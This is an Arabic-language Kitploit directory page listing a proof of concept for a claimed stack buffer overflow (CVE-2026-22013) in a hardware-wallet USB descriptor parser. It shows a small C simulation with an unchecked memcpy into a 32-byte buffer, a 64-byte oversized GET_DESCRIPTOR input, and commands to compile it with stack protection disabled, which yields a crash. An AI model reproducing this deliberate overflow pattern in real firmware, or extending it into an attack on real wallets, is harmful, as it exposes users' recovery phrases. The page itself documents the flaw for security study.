Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — إثبات مفهوم (PoC) لتجاوز سعة المخزن المؤقت للمكدس في محلل أوصاف USB لمحفظة أجهزة (CVE-2026-22013)، يُظهر استبدال عنوان العودة وتنفيذ التعليمات البرمجية عبر حمولة GET_DESCRIPTOR كبيرة الحجم. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاختراق الأجهزةأمن الأجهزةاستغلال الملفات الثنائية
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

إثبات مفهوم (PoC) لتجاوز سعة المخزن المؤقت للمكدس في محلل أوصاف USB لمحفظة أجهزة (CVE-2026-22013)، يُظهر استبدال عنوان العودة وتنفيذ التعليمات البرمجية عبر حمولة GET_DESCRIPTOR كبيرة الحجم.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-22013 – تجاوز سعة المخزن المؤقت لواصف USB في محفظة الأجهزة

كود البرنامج (محاكاة البرنامج الثابت بلغة C)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – تجاوز سعة المخزن المؤقت لواصف USB في محفظة الأجهزة

Severity: Critical

نظرة عامة

يعاني مكدس USB في محفظة الأجهزة من تجاوز سعة في المخزن المؤقت للمكدس عند تحليل طلب GET_DESCRIPTOR بحمولة زائدة الحجم. يمكن لمهاجم لديه وصول فعلي عبر USB استغلال ذلك لاستبدال عنوان العودة وتحقيق تنفيذ التعليمات البرمجية، مما يتيح استخراج عبارات الاستعادة.

تفاصيل الثغرة

  • النوع: تجاوز سعة المخزن المؤقت للمكدس
  • الأثر: اختراق كامل للجهاز واستخراج عبارات الاستعادة.
  • السبب الجذري: لا يتم التحقق من حقل طول الواصف قبل النسخ إلى مخزن مؤقت ثابت الحجم.

عرض الاستغلال

قم بتجميع الكود للبنية المستهدفة ثم شغّله (محاكاة):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

يتعطل البرنامج بسبب تلف المكدس.

تنزيل الأداة